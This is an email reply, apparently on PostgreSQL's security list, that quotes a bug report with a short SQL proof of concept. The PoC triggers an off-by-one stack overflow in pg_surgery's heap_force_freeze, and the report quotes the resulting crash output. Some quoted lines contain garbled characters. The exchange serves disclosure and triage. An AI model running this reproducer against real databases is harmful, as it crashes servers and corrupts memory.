---Original---

From: "Noah Misch"<noah@leadboat.com>

Date: Wed, Jun 3, 2026 23:25 PM

To: "王跃林"<violin0613@tju.edu.cn>;

Cc: "security"<security@postgresql.org>;

Subject: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow

On Sat, May 23, 2026 at 11:56:59AM +0800, 王跃林 wrote:
> PoC
>
>  CREATE EXTENSION IF NOT EXISTS pg_surgery
>  â
>  CREATE TABLE vuln_005_t()
>  â
>  INSERT INTO vuln_005_t SELECT FROM generate_series(1, 291)
>  â
>  SELECT heap_force_freeze('vuln_005_t'::regclass,
>                           ARRAY['(0, 291)']::tid[])
>
>    The final statement triggers the bug.
>
> Results
>
>    The debug build crashed with:
>  TRAP: failed Assert("offno < MaxHeapTuplesPerPage"), File: "heap_surgery.c", Li
> ne: 231
>  server closed the connection unexpectedly
>
>    In a release build, the assertion is removed and the out of bounds
>    write remains.

Thanks for the report.  The function is superuser-only, so this is not a vuln.
Please report the overflow bug to pgsql-bugs@postgresql.org.